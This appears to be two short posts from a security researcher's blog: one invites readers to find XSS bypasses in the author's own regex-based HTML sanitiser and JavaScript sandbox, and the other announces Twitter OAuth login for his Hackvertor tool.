I have not received any emails with any exploits. I am disappointed; I want my HTML regex sanitiser to be broken, please. Apparently you can find 2-5 vulnerabilities per solution, so please execute XSS in my regex. Thanks! I’ll be very impressed if you do, and I promise to dedicate a blog post to you.

HTML Regex sandbox

Please don’t stop there though :) I have a JavaScript sandbox that you can bypass that uses regular expressions.
JavaScript Regex sandbox

Thanks very much

Kind Regards
Gareth

Hackvertor supports OAuth

I’ve finally added Twitter OAuth support to Hackvertor; you can now log in via Twitter to save you from remembering yet another set of creds. I plan to use the Twitter features to enable realtime sharing of HVURLs and interface, maybe games and challenges too eventually. All points are reset :( but if you log in and tell me your previous id I’ll try to restore them, as well as any tags you might have created.

Hackvertor OAuth support!

Why should you use Hackvertor? I’m not forcing you, but it can help with finding weird stuff like this in WebKit:-
Regex weirdness